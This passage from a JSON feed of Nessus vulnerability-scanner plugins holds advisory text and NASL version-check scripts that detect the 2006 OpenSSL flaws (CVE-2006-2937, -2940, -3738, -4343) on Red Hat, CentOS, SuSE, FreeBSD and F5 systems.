audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0695\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-0.9.6b-46\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"openssl-0.9.6b-46\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-devel-0.9.6b-46\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-perl-0.9.6b-46\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl095a-0.9.5a-32\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl096-0.9.6-32\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"openssl-0.9.7a-33.21\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssl-devel-0.9.7a-33.21\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"openssl-perl-0.9.7a-33.21\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"openssl-0.9.7a-43.14\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl095a / openssl096 / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T15:12:29", "description": "According to its banner, the remote server is running a version of OpenSSL that is earlier than 0.9.7l or 0.9.8d. As such, it is affected by multiple vulnerabilities :\n\n - A remote attacker could trigger a denial of service, either via malformed ASN.1 structures or specially crafted public keys. (CVE-2006-2937, CVE-2006-3738)\n\n - A remote attacker could execute arbitrary code on the remote server by exploiting a buffer overflow in the SSL_get_shared_ciphers function. (CVE-2006-2940)\n\n - A remote attacker could crash a client by sending an invalid server Hello. (CVE-2006-4343)", "cvss3": {"score": null, "vector": null}, "published": "2012-01-04T00:00:00", "type": "nessus", "title": "OpenSSL < 0.9.7l / 0.9.8d Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-3738", "CVE-2006-2940", "CVE-2006-4343"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_0_9_7L_0_9_8D.NASL", "href": "https://www.tenable.com/plugins/nessus/17757", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17757);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-3738\", \"CVE-2006-2940\", \"CVE-2006-4343\");\n script_bugtraq_id(20247, 20248, 20249); # 22083 is for Oracle\n\n script_name(english:\"OpenSSL < 0.9.7l / 0.9.8d Multiple Vulnerabilities\");\n script_summary(english:\"Does a banner check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote server is running a version of\nOpenSSL that is earlier than 0.9.7l or 0.9.8d. As such, it is\naffected by multiple vulnerabilities :\n\n - A remote attacker could trigger a denial of service, \n either via malformed ASN.1 structures or specially \n crafted public keys. (CVE-2006-2937, CVE-2006-3738)\n\n - A remote attacker could execute arbitrary code on the \n remote server by exploiting a buffer overflow in the \n SSL_get_shared_ciphers function. (CVE-2006-2940)\n\n - A remote attacker could crash a client by sending an \n invalid server Hello. (CVE-2006-4343)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20060928.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.us-cert.gov/ncas/alerts/ta06-333a\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 0.9.7l / 0.9.8d or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\");\n script_require_keys(\"openssl/port\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\n\nopenssl_check_version(fixed:make_list('0.9.7l', '0.9.8d'), severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:15:19", "description": "Updated OpenSSL packages are now available to correct several security issues.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738). Few applications make use of this vulnerable function and generally it is used only when applications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a flaw in the SSLv2 client code. When a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time to process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error condition was mishandled. This can result in an infinite loop which consumed system memory (CVE-2006-2937). This issue does not affect the OpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to parse ASN.1 data from untrusted sources, including SSL servers which enable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\n\nNote: After installing this update, users are advised to either restart all services that use OpenSSL or restart their system.", "cvss3": {"score": null, "vector": null}, "published": "2006-10-02T00:00:00", "type": "nessus", "title": "CentOS 3 / 4 : openssl (CESA-2006:0695)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssl", "p-cpe:/a:centos:centos:openssl-devel", "p-cpe:/a:centos:centos:openssl-perl", "p-cpe:/a:centos:centos:openssl096b", "cpe:/o:centos:centos:3", "cpe:/o:centos:centos:4"], "id": "CENTOS_RHSA-2006-0695.NASL", "href": "https://www.tenable.com/plugins/nessus/22484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0695 and \n# CentOS Errata and Security Advisory 2006:0695 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"RHSA\", value:\"2006:0695\");\n\n script_name(english:\"CentOS 3 / 4 : openssl (CESA-2006:0695)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages are now available to correct several security\nissues.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between\nmachines. OpenSSL includes a certificate management tool and shared\nlibraries which provide various cryptographic algorithms and\nprotocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\nattacker could send a list of ciphers to an application that used this\nfunction and overrun a buffer (CVE-2006-3738). Few applications make\nuse of this vulnerable function and generally it is used only when\napplications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nflaw in the SSLv2 client code. When a client application used OpenSSL\nto create an SSLv2 connection to a malicious server, that server could\ncause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security\nrecently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk)\nwhich uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time\nto process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937). This issue does not affect the\nOpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to\nparse ASN.1 data from untrusted sources, including SSL servers which\nenable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\nNote: After installing this update, users are advised to either\nrestart all services that use OpenSSL or restart their system.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013297.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c7bb654\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013298.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c318f6f\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013299.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9b849c1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013306.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73087775\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-September/013307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee0793d7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl096b\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssl-devel-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssl-perl-0.9.7a-33.21\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"openssl096b-0.9.6b-16.46\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"openssl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"openssl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"openssl-devel-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"openssl-perl-0.9.7a-43.14\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"openssl096b-0.9.6b-22.46\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl096b\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:12:10", "description": "A buffer overflow condition within the SSL_get_shared_ciphers() function and a DoS condition known as 'parasitic public keys' have been fixed. The later problem allowed attackers to trick the OpenSSL engine to spend an extraordinary amount of time to process public keys. The following CAN numbers have been assigned: CVE-2006-2937 / CVE-2006-2940 / CVE-2006-3738 / CVE-2006-4343.", "cvss3": {"score": null, "vector": null}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 2141)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSSL-2141.NASL", "href": "https://www.tenable.com/plugins/nessus/29542", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29542);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 2141)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow condition within the SSL_get_shared_ciphers()\nfunction and a DoS condition known as 'parasitic public keys' have\nbeen fixed. The later problem allowed attackers to trick the OpenSSL\nengine to spend an extraordinary amount of time to process public\nkeys. The following CAN numbers have been assigned: CVE-2006-2937 /\nCVE-2006-2940 / CVE-2006-3738 / CVE-2006-4343.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-2937.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-2940.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3738.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-4343.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2141.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssl-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssl-devel-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssl-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssl-devel-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.10\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:14:14", "description": "Several problems have been found in OpenSSL :\n\n- During the parsing of certain invalid ASN1 structures an error condition is mishandled, possibly resulting in an infinite loop.\n\n- A buffer overflow exists in the SSL_get_shared_ciphers function.\n\n- A NULL pointer may be dereferenced in the SSL version 2 client code.\n\nIn addition, many applications using OpenSSL do not perform any validation of the lengths of public keys being used. Impact : Servers which parse ASN1 data from untrusted sources may be vulnerable to a denial of service attack.\n\nAn attacker accessing a server which uses SSL version 2 may be able to execute arbitrary code with the privileges of that server.\n\nA malicious SSL server can cause clients connecting using SSL version 2 to crash.\n\nApplications which perform public key operations using untrusted keys may be vulnerable to a denial of service attack. Workaround : No workaround is available, but not all of the vulnerabilities mentioned affect all applications.", "cvss3": {"score": null, "vector": null}, "published": "2007-02-27T00:00:00", "type": "nessus", "title": "FreeBSD : OpenSSL -- Multiple problems in crypto(3) (0f37d765-c5d4-11db-9f82-000e0c2e438a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:openssl", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0F37D765C5D411DB9F82000E0C2E438A.NASL", "href": "https://www.tenable.com/plugins/nessus/24719", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24719);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"FreeBSD\", value:\"SA-06:23.openssl\");\n\n script_name(english:\"FreeBSD : OpenSSL -- Multiple problems in crypto(3) (0f37d765-c5d4-11db-9f82-000e0c2e438a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several problems have been found in OpenSSL :\n\n- During the parsing of certain invalid ASN1 structures an error\ncondition is mishandled, possibly resulting in an infinite loop.\n\n- A buffer overflow exists in the SSL_get_shared_ciphers function.\n\n- A NULL pointer may be dereferenced in the SSL version 2 client code.\n\nIn addition, many applications using OpenSSL do not perform any\nvalidation of the lengths of public keys being used. Impact : Servers\nwhich parse ASN1 data from untrusted sources may be vulnerable to a\ndenial of service attack.\n\nAn attacker accessing a server which uses SSL version 2 may be able to\nexecute arbitrary code with the privileges of that server.\n\nA malicious SSL server can cause clients connecting using SSL version\n2 to crash.\n\nApplications which perform public key operations using untrusted keys\nmay be vulnerable to a denial of service attack. Workaround : No\nworkaround is available, but not all of the vulnerabilities mentioned\naffect all applications.\"\n );\n # https://vuxml.freebsd.org/freebsd/0f37d765-c5d4-11db-9f82-000e0c2e438a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a3352693\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"openssl<0.9.7l_0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"openssl>=0.9.8<0.9.8d_0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:21", "description": "The remote BIG-IP device is missing a patch required by a security advisory.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Local OpenSSL vulnerabilities (SOL6734)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-11T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", 